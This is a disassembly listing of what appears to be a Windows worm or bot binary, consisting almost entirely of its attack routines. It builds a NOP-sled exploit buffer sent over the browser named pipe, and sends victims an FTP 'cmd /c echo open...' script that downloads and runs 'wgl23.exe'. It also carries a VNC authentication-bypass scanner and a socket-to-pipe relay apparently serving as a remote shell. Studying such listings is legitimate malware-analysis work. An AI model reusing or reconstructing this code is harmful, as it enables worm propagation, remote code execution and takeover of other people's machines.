loc_40E3FA: ; CODE XREF: sub_40E311+D8�j
; sub_40E311+DC�j
pop edi
pop esi
pop ebx
leave
retn
sub_40E311 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_40E3FF(char *Size,void *Memory)
sub_40E3FF proc near ; CODE XREF: sub_40E9F5+B�p
var_60F0 = qword ptr -60F0h
var_60DC = byte ptr -60DCh
var_40DC = byte ptr -40DCh
Dest = byte ptr -20DCh
Dst = byte ptr -0DCh
var_C8 = dword ptr -0C8h
var_BC = byte ptr -0BCh
var_B8 = byte ptr -0B8h
var_B7 = byte ptr -0B7h
var_B6 = byte ptr -0B6h
var_B5 = byte ptr -0B5h
var_B4 = dword ptr -0B4h
var_B0 = word ptr -0B0h
var_AE = word ptr -0AEh
var_AC = dword ptr -0ACh
var_A8 = word ptr -0A8h
var_A6 = word ptr -0A6h
var_A4 = dword ptr -0A4h
var_A0 = dword ptr -0A0h
var_9C = word ptr -9Ch
var_9A = byte ptr -9Ah
var_98 = byte ptr -98h
var_88 = dword ptr -88h
var_84 = byte ptr -84h
var_74 = dword ptr -74h
Src = dword ptr -70h
var_6C = dword ptr -6Ch
var_68 = dword ptr -68h
var_64 = dword ptr -64h
var_60 = word ptr -60h
var_5C = byte ptr -5Ch
var_4C = dword ptr -4Ch
var_48 = byte ptr -48h
var_47 = byte ptr -47h
var_46 = byte ptr -46h
var_45 = byte ptr -45h
var_44 = dword ptr -44h
var_3E = word ptr -3Eh
var_3C = dword ptr -3Ch
var_34 = word ptr -34h
var_32 = word ptr -32h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = byte ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = byte ptr -14h
var_10 = qword ptr -10h
var_8 = dword ptr -8
var_4 = dword ptr -4
Size = dword ptr 8
Memory = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, 60DCh
call __alloca_probe
push ebx
push esi
push edi
push offset a__6 ; "."
push [ebp+Size] ; Str1
call __strcmpi
pop ecx
xor ebx, ebx
test eax, eax
pop ecx
jz short loc_40E475
push [ebp+Size]
mov esi, 2000h
lea eax, [ebp+Dest]
push offset aSIpc ; "\\\\%s\\ipc$"
push esi ; Count
push eax ; Dest
call __snprintf
push 20h ; Size
lea eax, [ebp+Dst]
push ebx ; Val
push eax ; Dst
call _memset
add esp, 1Ch
lea eax, [ebp+Dest]
mov [ebp+var_C8], eax
lea eax, [ebp+Dst]
push ebx
push offset dword_4E6F64
push offset dword_4E6F68
push eax
call sub_43B886
jmp short loc_40E47A
; ---------------------------------------------------------------------------
loc_40E475: ; CODE XREF: sub_40E3FF+23�j
mov esi, 2000h
loc_40E47A: ; CODE XREF: sub_40E3FF+74�j
push [ebp+Size]
lea eax, [ebp+var_40DC]
push offset aSPipeBrowser ; "\\\\%s\\pipe\\browser"
push esi ; Count
push eax ; Dest
call __snprintf
add esp, 10h
lea eax, [ebp+var_40DC]
push ebx
push 40000000h
push 3
push ebx
push 3
push 0C0000000h
push eax
call ds:dword_4F63F4 ; CreateFileA
cmp eax, 0FFFFFFFFh
mov [ebp+var_4], eax
jnz short loc_40E4BE
loc_40E4B7: ; CODE XREF: sub_40E3FF+197�j
; sub_40E3FF+36D�j ...
xor al, al
jmp loc_40E902
; ---------------------------------------------------------------------------
loc_40E4BE: ; CODE XREF: sub_40E3FF+B6�j
push 48h ; Size
lea eax, [ebp+var_B8]
push ebx ; Val
push eax ; Dst
call _memset
push 10h
mov [ebp+var_B8], 5
pop eax
mov [ebp+var_B7], bl
push 1
mov [ebp+var_B4], eax
pop edi
mov [ebp+var_B6], 0Bh
push eax ; Size
lea eax, [ebp+var_98]
push offset dword_44A16C ; Src
push eax ; Dst
mov [ebp+var_B5], 3
mov [ebp+var_B0], 48h
mov [ebp+var_AE], bx
mov [ebp+var_AC], ebx
mov [ebp+var_A8], 10B8h
mov [ebp+var_A6], 10B8h
mov [ebp+var_A4], ebx
mov [ebp+var_A0], edi
mov [ebp+var_9C], bx
mov [ebp+var_9A], 1
call _memcpy
push 10h ; Size
lea eax, [ebp+var_84]
push offset dword_44A180 ; Src
push eax ; Dst
mov [ebp+var_88], 3
call _memcpy
add esp, 24h
lea eax, [ebp+var_BC]
mov [ebp+var_74], 2
push ebx
push eax
lea eax, [ebp+var_B8]
push 48h
push eax
push [ebp+var_4]
call ds:dword_4F63E8 ; WriteFile
test eax, eax
jnz short loc_40E59B
loc_40E58D: ; CODE XREF: sub_40E3FF+268�j
push [ebp+var_4]
call ds:dword_4F6370 ; CloseHandle
jmp loc_40E4B7
; ---------------------------------------------------------------------------
loc_40E59B: ; CODE XREF: sub_40E3FF+18C�j
lea eax, [ebp+var_14]
push ebx
push eax
lea eax, [ebp+var_60DC]
push esi
push eax
push [ebp+var_4]
call ds:dword_4F63F0 ; ReadFile
push ebx ; Time
call _time
push eax ; Seed
call _srand
push 14h ; Size
lea eax, [ebp+Src]
push 41h ; Val
push eax ; Dst
call _memset
push 1Ch ; Size
lea eax, [ebp+var_30]
push 41h ; Val
push eax ; Dst
call _memset
add esp, 20h
call _rand
mov esi, [ebp+Memory]
mov [ebp+Src], eax
mov [ebp+var_64], edi
mov [ebp+var_68], ebx
lea esi, [esi+esi*4]
mov [ebp+var_6C], edi
shl esi, 2
mov [ebp+var_60], bx
cmp byte_44A0F8[esi], bl
jz short loc_40E612
push 4
mov [ebp+var_24], edi
mov [ebp+var_28], ebx
mov [ebp+var_2C], edi
push offset dword_4E6F6C
jmp short loc_40E625
; ---------------------------------------------------------------------------
loc_40E612: ; CODE XREF: sub_40E3FF+1FF�j
push 2
mov [ebp+var_28], ebx
pop eax
push 4 ; Size
mov [ebp+var_24], eax
mov [ebp+var_2C], eax
push offset dword_44A194 ; Src
loc_40E625: ; CODE XREF: sub_40E3FF+211�j
lea eax, [ebp+var_20]
push eax ; Dst
call _memcpy
add esp, 0Ch
call _rand
mov edi, 0FAh
cdq
mov ecx, edi
idiv ecx
inc edx
mov [ebp+var_30], edx
call _rand
cdq
idiv edi
mov eax, dword_44A0EC[esi]
mov [ebp+var_18], ebx
push eax ; Size
mov [ebp+Size], eax
inc edx
mov [ebp+var_1C], edx
call _malloc
mov edi, eax
pop ecx
cmp edi, ebx
jz loc_40E58D
mov eax, [ebp+Size]
add eax, 0FFFFFFFEh
push eax ; Size
push 90h ; Val
push edi ; Dst
call _memset
mov eax, [ebp+Size]
push 2 ; Size
push ebx ; Val
lea eax, [edi+eax-2]
push eax ; Dst
call _memset
mov eax, dword_44A0F4[esi]
push 7 ; Size
add eax, edi
push offset dword_44A0E0 ; Src
push eax ; Dst
mov [ebp+Memory], eax
call _memcpy
mov eax, [ebp+Memory]
push 15Ch ; Size
add eax, 7
push offset dword_449F80 ; Src
push eax ; Dst
call _memcpy
mov eax, dword_44A0F0[esi]
add esp, 30h
cmp byte_44A0F8[esi], bl
mov [ebp+Memory], eax
jz short loc_40E71E
push 4 ; Size
add eax, edi
push offset dword_4E6F5C ; Src
push eax ; Dst
call _memcpy
add [ebp+Memory], 0Ch
mov esi, offset dword_44A110
mov eax, [ebp+Memory]
push 4 ; Size
add eax, edi
push esi ; Src
push eax ; Dst
call _memcpy
mov eax, [ebp+Memory]
push 4 ; Size
push esi ; Src
lea eax, [eax+edi+24h]
push eax ; Dst
mov [ebp+Memory], eax
call _memcpy
mov eax, [ebp+Memory]
push 4 ; Size
add eax, 0Ch
push esi ; Src
push eax ; Dst
call _memcpy
add esp, 30h
jmp short loc_40E746
; ---------------------------------------------------------------------------
loc_40E71E: ; CODE XREF: sub_40E3FF+2D0�j
add eax, edi
mov [ebp+var_8], 10h
mov [ebp+Memory], eax
mov esi, offset dword_44A110
loc_40E72F: ; CODE XREF: sub_40E3FF+345�j
push 4 ; Size
push esi ; Src
push [ebp+Memory] ; Dst
call _memcpy
add [ebp+Memory], 4
add esp, 0Ch
dec [ebp+var_8]
jnz short loc_40E72F
loc_40E746: ; CODE XREF: sub_40E3FF+31D�j
mov eax, [ebp+Size]
add eax, 42h
push eax ; Size
call _malloc
mov esi, eax
pop ecx
cmp esi, ebx
mov [ebp+var_8], esi
jnz short loc_40E771
push [ebp+var_4]
call ds:dword_4F6370 ; CloseHandle
push edi ; Memory
call _free
pop ecx
jmp loc_40E4B7
; ---------------------------------------------------------------------------
loc_40E771: ; CODE XREF: sub_40E3FF+35B�j
mov eax, [ebp+Size]
add eax, 42h
push eax ; Size
push ebx ; double
push esi ; Dst
call _memset
lea eax, [ebp+Src]
push 14h ; Size
push eax ; Src
push esi ; Dst
call _memcpy
mov eax, [ebp+Size]
mov dword ptr [ebp+var_10+4], ebx
mov dword ptr [ebp+var_10], eax
add esp, 10h
fild [ebp+var_10]
fmul ds:flt_43D480
fstp [esp+60F0h+var_60F0]
call _ceil
call __ftol
push [ebp+Size] ; Size
mov [esi+1Ch], eax
mov [esi+18h], ebx
mov eax, [esi+1Ch]
mov [esi+14h], eax
lea eax, [esi+20h]
push edi ; Src
push eax ; Dst
call _memcpy
mov eax, [ebp+Size]
add esp, 14h
add eax, 20h
test al, 3
mov [ebp+Memory], eax
jz short loc_40E7DE
loc_40E7D6: ; CODE XREF: sub_40E3FF+3DA�j
inc eax
test al, 3
jnz short loc_40E7D6
mov [ebp+Memory], eax
loc_40E7DE: ; CODE XREF: sub_40E3FF+3D5�j
lea ecx, [ebp+var_30]
push 1Ch ; Size
add eax, esi
push ecx ; Src
push eax ; Dst
call _memcpy
add [ebp+Memory], 1Ch
push edi ; Memory
call _free
push 18h ; Size
lea eax, [ebp+var_48]
push ebx ; Val
push eax ; Dst
call _memset
push 14h ; Size
lea eax, [ebp+var_5C]
push ebx ; Val
push eax ; Dst
mov [ebp+var_48], 5
mov [ebp+var_47], bl
mov [ebp+var_46], bl
mov [ebp+var_45], 3
mov [ebp+var_44], 10h
mov [ebp+var_3E], bx
mov [ebp+var_3C], ebx
mov [ebp+var_34], bx
mov [ebp+var_32], 1Fh
call _memset
add esp, 28h
push ebx
push ebx
push 1
push ebx
call ds:dword_4F63EC ; CreateEventA
mov [ebp+var_4C], eax
mov byte ptr [ebp+Size+3], bl
mov dword ptr [ebp+var_10+4], ebx
loc_40E84B: ; CODE XREF: sub_40E3FF+4D6�j
cmp dword ptr [ebp+var_10+4], 2
jge loc_40E8E0
push 1 ; char
push 10B8h ; int
push [ebp+Memory] ; Memory
inc dword ptr [ebp+var_10+4]
push esi ; Src
lea esi, [ebp+var_48]
sub esp, 18h
push 6
pop ecx
mov edi, esp
push [ebp+var_4] ; int
rep movsd
call sub_40E311
add esp, 2Ch
test al, al
jz short loc_40E8DD
cmp [ebp+var_4C], ebx
jz short loc_40E8CF
lea eax, [ebp+var_5C]
push eax
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_60DC]
push 2000h
push eax
push [ebp+var_4]
call ds:dword_4F63F0 ; ReadFile
test eax, eax
jnz short loc_40E8B6
call ds:dword_4F6394 ; RtlGetLastWin32Error
cmp eax, 3E5h
jnz loc_40E4B7
loc_40E8B6: ; CODE XREF: sub_40E3FF+4A4�j
push 3E8h
push [ebp+var_4C]
call ds:dword_4F63A8 ; WaitForSingleObject
cmp eax, 102h
jnz short loc_40E8CF
mov byte ptr [ebp+Size+3], 1
loc_40E8CF: ; CODE XREF: sub_40E3FF+483�j
; sub_40E3FF+4CA�j
cmp byte ptr [ebp+Size+3], bl
mov esi, [ebp+var_8]
jz loc_40E84B
jmp short loc_40E8E0
; ---------------------------------------------------------------------------
loc_40E8DD: ; CODE XREF: sub_40E3FF+47E�j
mov esi, [ebp+var_8]
loc_40E8E0: ; CODE XREF: sub_40E3FF+450�j
; sub_40E3FF+4DC�j
push [ebp+var_4]
mov edi, ds:dword_4F6370
call edi ; CloseHandle
push esi ; Memory
call _free
cmp [ebp+var_4C], ebx
pop ecx
jz short loc_40E8FC
push [ebp+var_4C]
call edi ; CloseHandle
loc_40E8FC: ; CODE XREF: sub_40E3FF+4F6�j
cmp byte ptr [ebp+Size+3], bl
setnz al
loc_40E902: ; CODE XREF: sub_40E3FF+BA�j
pop edi
pop esi
pop ebx
leave
retn
sub_40E3FF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40E907 proc near ; CODE XREF: sub_40E9F5+29�p
var_5A0 = byte ptr -5A0h
Str = byte ptr -1A0h
Dst = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
arg_4 = byte ptr 0Ch
arg_BC = dword ptr 0C4h
push ebp
mov ebp, esp
sub esp, 5A0h
push ebx
push esi
push edi
xor esi, esi
push 10h ; Size
lea eax, [ebp+Dst]
push esi ; Val
push eax ; Dst
call _memset
add esp, 0Ch
lea eax, [ebp+arg_4]
mov [ebp+Dst], 2
push eax
call ds:dword_4F655C ; inet_addr
push [ebp+arg_BC]
mov [ebp+var_C], eax
call ds:dword_4F6560 ; htons
push esi
push 1
push 2
mov [ebp+var_E], ax
call ds:dword_4F6570 ; socket
mov ebx, eax
cmp ebx, 0FFFFFFFFh
jz short loc_40E9D5
lea eax, [ebp+Dst]
push 10h
push eax
push ebx
call ds:dword_4F6564 ; connect
cmp eax, 0FFFFFFFFh
jz short loc_40E9D5
mov edi, 400h
push esi
mov esi, ds:dword_4F6568
lea eax, [ebp+var_5A0]
push edi
push eax
push ebx
call esi ; recv
mov eax, offset Str ; "wgl23.exe"
push eax
push eax
push dword_4E3F28
push [ebp+arg_0]
call sub_40AFA9
pop ecx
push eax
push offset aCmdCEchoOpen_0 ; "cmd /c echo open %s %d >> ii &echo user"...
lea eax, [ebp+Str]
push 190h ; Count
push eax ; Dest
call __snprintf
add esp, 1Ch
lea eax, [ebp+Str]
push 0
push eax ; Str
call _strlen
pop ecx
push eax
lea eax, [ebp+Str]
push eax
push ebx
call ds:dword_4F6574 ; send
cmp eax, 0FFFFFFFFh
jnz short loc_40E9D9
loc_40E9D5: ; CODE XREF: sub_40E907+50�j
; sub_40E907+62�j
xor eax, eax
jmp short loc_40E9F0
; ---------------------------------------------------------------------------
loc_40E9D9: ; CODE XREF: sub_40E907+CC�j
push 0
lea eax, [ebp+var_5A0]
push edi
push eax
push ebx
call esi ; recv
push ebx
call ds:dword_4F656C ; closesocket
push 1
pop eax
loc_40E9F0: ; CODE XREF: sub_40E907+D0�j
pop edi
pop esi
pop ebx
leave
retn
sub_40E907 endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_40E9F5(char,char Size)
sub_40E9F5 proc near ; DATA XREF: .data:004492CC�o
; .data:0044930C�o
arg_0 = byte ptr 4
Size = byte ptr 8
push ebx
push esi
push edi
xor ebx, ebx
loc_40E9FA: ; CODE XREF: sub_40E9F5+4B�j
lea eax, [esp+0Ch+Size]
push ebx ; Memory
push eax ; Size
call sub_40E3FF
pop ecx
test al, al
pop ecx
jz short loc_40EA2D
push 65h
lea esi, [esp+10h+arg_0]
sub esp, 0BCh
push 2Fh
pop ecx
mov edi, esp
rep movsd
call sub_40E907
add esp, 0C0h
test eax, eax
jnz short loc_40EA42
loc_40EA2D: ; CODE XREF: sub_40E9F5+14�j
test ebx, ebx
jnz short loc_40EA3C
push 7D0h
call ds:dword_4F6380 ; Sleep
loc_40EA3C: ; CODE XREF: sub_40E9F5+3A�j
inc ebx
cmp ebx, 2
jb short loc_40E9FA
loc_40EA42: ; CODE XREF: sub_40E9F5+36�j
push 1
pop eax
pop edi
pop esi
pop ebx
retn
sub_40E9F5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40EA49 proc near ; CODE XREF: sub_40EB60+91�p
var_5A0 = byte ptr -5A0h
Dest = byte ptr -1A0h
Dst = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
arg_4 = byte ptr 0Ch
arg_BC = dword ptr 0C4h
push ebp
mov ebp, esp
sub esp, 5A0h
push ebx
push esi
push edi
xor esi, esi
push 10h ; Size
lea eax, [ebp+Dst]
push esi ; Val
push eax ; Dst
call _memset
add esp, 0Ch
lea eax, [ebp+arg_4]
mov [ebp+Dst], 2
push eax
call ds:dword_4F655C ; inet_addr
push [ebp+arg_BC]
mov [ebp+var_C], eax
call ds:dword_4F6560 ; htons
push esi
push 1
push 2
mov [ebp+var_E], ax
call ds:dword_4F6570 ; socket
mov ebx, eax
cmp ebx, 0FFFFFFFFh
jz short loc_40EB17
lea eax, [ebp+Dst]
push 10h
push eax
push ebx
call ds:dword_4F6564 ; connect
cmp eax, 0FFFFFFFFh
jz short loc_40EB17
mov edi, 400h
push esi
mov esi, ds:dword_4F6568
lea eax, [ebp+var_5A0]
push edi
push eax
push ebx
call esi ; recv
mov eax, offset Str ; "wgl23.exe"
push eax
push eax
push dword_4E3F28
push [ebp+arg_0]
call sub_40AFA9
pop ecx
push eax
push offset aCmdCEchoOpen_1 ; "cmd /c echo open %s %d >> ii &echo user"...
lea eax, [ebp+Dest]
push 190h ; Count
push eax ; Dest
call __snprintf
add esp, 1Ch
lea eax, [ebp+Dest]
push 0
push eax ; Str
call _strlen
pop ecx
push eax
lea eax, [ebp+Dest]
push eax
push ebx
call ds:dword_4F6574 ; send
cmp eax, 0FFFFFFFFh
jnz short loc_40EB1B
loc_40EB17: ; CODE XREF: sub_40EA49+50�j
; sub_40EA49+62�j
xor eax, eax
jmp short loc_40EB32
; ---------------------------------------------------------------------------
loc_40EB1B: ; CODE XREF: sub_40EA49+CC�j
push 0
lea eax, [ebp+var_5A0]
push edi
push eax
push ebx
call esi ; recv
push ebx
call ds:dword_4F656C ; closesocket
push 1
pop eax
loc_40EB32: ; CODE XREF: sub_40EA49+D0�j
pop edi
pop esi
pop ebx
leave
retn
sub_40EA49 endp
; ---------------------------------------------------------------------------
push dword ptr [esp+4]
call ds:dword_4F655C ; inet_addr
cmp eax, 0FFFFFFFFh
jnz short locret_40EB5F
push dword ptr [esp+4]
call ds:dword_4F6558 ; gethostbyname
test eax, eax
jnz short loc_40EB58
or eax, 0FFFFFFFFh
retn
; ---------------------------------------------------------------------------
loc_40EB58: ; CODE XREF: .text:0040EB52�j
mov eax, [eax+0Ch]
mov eax, [eax]
mov eax, [eax]
locret_40EB5F: ; CODE XREF: .text:0040EB44�j
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40EB60 proc near ; CODE XREF: sub_40C989+1EA�p
; DATA XREF: .data:off_44924C�o
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
arg_0 = byte ptr 8
arg_4 = byte ptr 0Ch
arg_A0 = dword ptr 0A8h
arg_A8 = dword ptr 0B0h
push ebp
mov ebp, esp
sub esp, 10h
push esi
lea eax, [ebp+arg_4]
push edi
push eax
mov [ebp+var_10], 2
call dword_4E4260 ; inet_addr
push [ebp+arg_A0]
mov [ebp+var_C], eax
call dword_4E4220 ; htons
push 6
push 1
push 2
mov [ebp+var_E], ax
call ds:dword_4F6570 ; socket
mov esi, eax
cmp esi, 0FFFFFFFFh
jz short loc_40EBD2
lea eax, [ebp+var_10]
push 10h
push eax
push esi
call ds:dword_4F6564 ; connect
cmp eax, 0FFFFFFFFh
jnz short loc_40EBB3
push esi
jmp short loc_40EBCC
; ---------------------------------------------------------------------------
loc_40EBB3: ; CODE XREF: sub_40EB60+4E�j
push 0
push 1213h
push offset dword_44A210
push esi
call ds:dword_4F6574 ; send
cmp eax, 0FFFFFFFFh
push esi
jnz short loc_40EBD6
loc_40EBCC: ; CODE XREF: sub_40EB60+51�j
call ds:dword_4F656C ; closesocket
loc_40EBD2: ; CODE XREF: sub_40EB60+3C�j
xor eax, eax
jmp short loc_40EC18
; ---------------------------------------------------------------------------
loc_40EBD6: ; CODE XREF: sub_40EB60+6A�j
call ds:dword_4F656C ; closesocket
push 216Bh
lea esi, [ebp+arg_0]
sub esp, 0BCh
push 2Fh
pop ecx
mov edi, esp
rep movsd
call sub_40EA49
add esp, 0C0h
test eax, eax
jz short loc_40EC15
mov eax, [ebp+arg_A8]
shl eax, 6
inc dword_449250[eax]
lea eax, dword_449250[eax]
loc_40EC15: ; CODE XREF: sub_40EB60+9E�j
push 1
pop eax
loc_40EC18: ; CODE XREF: sub_40EB60+74�j
pop edi
pop esi
leave
retn
sub_40EB60 endp
; =============== S U B R O U T I N E =======================================
sub_40EC1C proc near ; CODE XREF: sub_40EC96+74�p
; sub_40EC96+D6�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push esi
push edi
mov edi, [esp+8+arg_8]
xor esi, esi
loc_40EC24: ; CODE XREF: sub_40EC1C+2D�j
test edi, edi
jle short loc_40EC4F
mov eax, [esp+8+arg_4]
push 0
add eax, esi
push edi
push eax
push [esp+14h+arg_0]
call dword_4E4238 ; recv
test eax, eax
jz short loc_40EC4B
cmp eax, 0FFFFFFFFh
jz short loc_40EC4B
sub edi, eax
add esi, eax
jmp short loc_40EC24
; ---------------------------------------------------------------------------
loc_40EC4B: ; CODE XREF: sub_40EC1C+22�j
; sub_40EC1C+27�j
xor eax, eax
jmp short loc_40EC52
; ---------------------------------------------------------------------------
loc_40EC4F: ; CODE XREF: sub_40EC1C+A�j
push 1
pop eax
loc_40EC52: ; CODE XREF: sub_40EC1C+31�j
pop edi
pop esi
retn
sub_40EC1C endp
; =============== S U B R O U T I N E =======================================
sub_40EC55 proc near ; CODE XREF: sub_40EC96+C0�p
; sub_40EC96+ED�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push esi
push edi
mov edi, [esp+8+arg_8]
test edi, edi
jz short loc_40EC92
xor esi, esi
test edi, edi
jle short loc_40EC8C
loc_40EC65: ; CODE XREF: sub_40EC55+35�j
mov eax, edi
push 0
sub eax, esi
push eax
mov eax, [esp+10h+arg_4]
add eax, esi
push eax
push [esp+14h+arg_0]
call dword_4E4270 ; send
cmp eax, 0FFFFFFFFh
jz short loc_40EC92
test eax, eax
jz short loc_40EC92
add esi, eax
cmp esi, edi
jl short loc_40EC65
loc_40EC8C: ; CODE XREF: sub_40EC55+E�j
push 1
pop eax
loc_40EC8F: ; CODE XREF: sub_40EC55+3F�j
pop edi
pop esi
retn
; ---------------------------------------------------------------------------
loc_40EC92: ; CODE XREF: sub_40EC55+8�j
; sub_40EC55+2B�j ...
xor eax, eax
jmp short loc_40EC8F
sub_40EC55 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_40EC96(int,char,int,int,int,char Str,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int)
sub_40EC96 proc near ; DATA XREF: .data:0044928C�o
Dest = byte ptr -24Ch
var_4C = word ptr -4Ch
var_4A = word ptr -4Ah
var_48 = dword ptr -48h
var_3C = byte ptr -3Ch
Src = byte ptr -38h
var_2C = byte ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = word ptr -1Ch
var_1A = word ptr -1Ah
var_14 = word ptr -14h
var_12 = word ptr -12h
var_10 = word ptr -10h
var_8 = dword ptr -8
var_2 = word ptr -2
arg_0 = dword ptr 8
arg_4 = byte ptr 0Ch
Str = byte ptr 1Ch
arg_A0 = dword ptr 0A8h
arg_A8 = dword ptr 0B0h
arg_B0 = dword ptr 0B8h
push ebp
mov ebp, esp
sub esp, 24Ch
push ebx
mov ax, word_44B498
push esi
push edi
push 0
push 1
push 2
mov [ebp+var_2], ax
pop edi
push edi
call dword_4E42A0 ; socket
mov esi, eax
cmp esi, 0FFFFFFFFh
jnz short loc_40ECC4
push eax
jmp short loc_40ECF8
; ---------------------------------------------------------------------------
loc_40ECC4: ; CODE XREF: sub_40EC96+29�j
lea eax, [ebp+arg_4]
push eax
call dword_4E4260 ; inet_addr
push [ebp+arg_A0]
mov [ebp+var_48], eax
mov [ebp+var_4C], di
call dword_4E4220 ; htons
mov [ebp+var_4A], ax
lea eax, [ebp+var_4C]
push 10h
push eax
push esi
call dword_4E41C8 ; connect
cmp eax, 0FFFFFFFFh
jnz short loc_40ED03
push esi
loc_40ECF8: ; CODE XREF: sub_40EC96+2C�j
call dword_4E42B8 ; closesocket
jmp loc_40EEF4
; ---------------------------------------------------------------------------
loc_40ED03: ; CODE XREF: sub_40EC96+5F�j
lea eax, [ebp+Src]
push 0Ch
push eax
push esi
call sub_40EC1C
add esp, 0Ch
test eax, eax
jz loc_40EEED
lea eax, [ebp+var_20]
and [ebp+var_2C], 0
push eax
lea eax, [ebp+var_28]
push eax
lea eax, [ebp+Src]
push offset aRfb03d_03d ; "RFB %03d.%03d\n"
push eax ; Src
call _sscanf
add esp, 10h
cmp eax, edi
jnz loc_40EEED
cmp [ebp+var_28], 3
jz short loc_40ED4F
cmp [ebp+var_20], 8
jnz loc_40EEED
loc_40ED4F: ; CODE XREF: sub_40EC96+AD�j
lea eax, [ebp+Src]
push 0Ch
push eax
push esi
call sub_40EC55
add esp, 0Ch
test eax, eax
jz loc_40EEED
lea eax, [ebp+var_3C]
push edi
push eax
push esi
call sub_40EC1C
add esp, 0Ch
test eax, eax
jz loc_40EEED
lea eax, [ebp+var_2]
push 1
push eax
push esi
call sub_40EC55
add esp, 0Ch
test eax, eax
jz loc_40EEED
lea eax, [ebp+var_24]
push 4
push eax
push esi
call sub_40EC1C
add esp, 0Ch
test eax, eax
jz loc_40EEED
mov eax, [ebp+var_24]
mov ebx, 0FF0000h
mov ecx, eax
mov edx, eax
and ecx, ebx
mov edi, 0FF00h
shr edx, 10h
or ecx, edx
mov edx, eax
shl edx, 10h
and eax, edi
or edx, eax
shr ecx, 8
shl edx, 8
or ecx, edx
mov [ebp+var_24], ecx
jnz loc_40EEED
push 1
push offset dword_4E6F78
push esi
call sub_40EC55
add esp, 0Ch
test eax, eax
jz loc_40EEED
lea eax, [ebp+var_1C]
push 18h
push eax
push esi
call sub_40EC1C
add esp, 0Ch
test eax, eax
jz loc_40EEED
xor eax, eax
mov ecx, [ebp+var_8]
mov al, byte ptr [ebp+var_1C+1]
mov edx, ecx
mov ah, byte ptr [ebp+var_1C]
mov [ebp+var_1C], ax
xor eax, eax
mov al, byte ptr [ebp+var_1A+1]
mov ah, byte ptr [ebp+var_1A]
mov [ebp+var_1A], ax
xor eax, eax
mov al, byte ptr [ebp+var_14+1]
mov ah, byte ptr [ebp+var_14]
mov [ebp+var_14], ax
xor eax, eax
mov al, byte ptr [ebp+var_12+1]
mov ah, byte ptr [ebp+var_12]
mov [ebp+var_12], ax
xor eax, eax
mov al, byte ptr [ebp+var_10+1]
mov ah, byte ptr [ebp+var_10]
mov [ebp+var_10], ax
mov eax, ecx
and eax, ebx
shr edx, 10h
or eax, edx
mov edx, ecx
shl edx, 10h
and ecx, edi
or edx, ecx
shr eax, 8
shl edx, 8
or eax, edx
mov [ebp+var_8], eax
add eax, 2
push eax ; unsigned int
call ??2@YAPAXI@Z ; operator new(uint)
push [ebp+var_8]
mov edi, eax
push edi
push esi
call sub_40EEFB
add esp, 10h
lea eax, [ebp+arg_4]
push eax
push edi
push [ebp+var_20]
lea eax, [ebp+Dest]
push [ebp+var_28]
push offset aVncD_DSSAuthby ; "VNC%d.%d %s: %s - [AuthBypass]"
push 200h ; Count
push eax ; Dest
call __snprintf
push 0 ; int
lea eax, [ebp+Dest]
push [ebp+arg_B0] ; int
push eax ; int
lea eax, [ebp+Str]
push eax ; Str
push [ebp+arg_0] ; int
call sub_409D6C
lea eax, [ebp+Dest]
push eax
call sub_415C77
mov eax, [ebp+arg_A8]
add esp, 34h
shl eax, 6
inc dword_449250[eax]
push esi
lea eax, dword_449250[eax]
call ds:dword_4F656C ; closesocket
push 1
pop eax
jmp short loc_40EEF6
; ---------------------------------------------------------------------------
loc_40EEED: ; CODE XREF: sub_40EC96+7E�j
; sub_40EC96+A3�j ...
push esi
call ds:dword_4F656C ; closesocket
loc_40EEF4: ; CODE XREF: sub_40EC96+68�j
xor eax, eax
loc_40EEF6: ; CODE XREF: sub_40EC96+255�j
pop edi
pop esi
pop ebx
leave
retn
sub_40EC96 endp
; =============== S U B R O U T I N E =======================================
sub_40EEFB proc near ; CODE XREF: sub_40EC96+1E3�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push esi
mov esi, [esp+4+arg_8]
push edi
mov edi, [esp+8+arg_4]
test esi, esi
jle short loc_40EF17
push esi
push edi
push [esp+10h+arg_0]
call sub_40EC1C
add esp, 0Ch
loc_40EF17: ; CODE XREF: sub_40EEFB+C�j
and byte ptr [edi+esi], 0
pop edi
pop esi
retn
sub_40EEFB endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame
sub_40EF1E proc near ; DATA XREF: sub_40EFAC+15B�o
var_404 = byte ptr -404h
var_4 = byte ptr -4
push ebp
mov ebp, esp
sub esp, 404h
loc_40EF27: ; CODE XREF: sub_40EF1E+25�j
; sub_40EF1E+41�j
push 0
lea eax, [ebp+var_404]
push 400h
push eax
push dword_4E6F8C
call dword_4E4238 ; recv
test eax, eax
jle short loc_40EF27
lea ecx, [ebp+var_4]
push 0
push ecx
push eax
lea eax, [ebp+var_404]
push eax
push dword_4E6F88
call ds:dword_4F63E8 ; WriteFile
jmp short loc_40EF27
sub_40EF1E endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame
sub_40EF61 proc near ; DATA XREF: sub_40EFAC+142�o
var_404 = byte ptr -404h
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 404h
loc_40EF6A: ; CODE XREF: sub_40EF61+2F�j
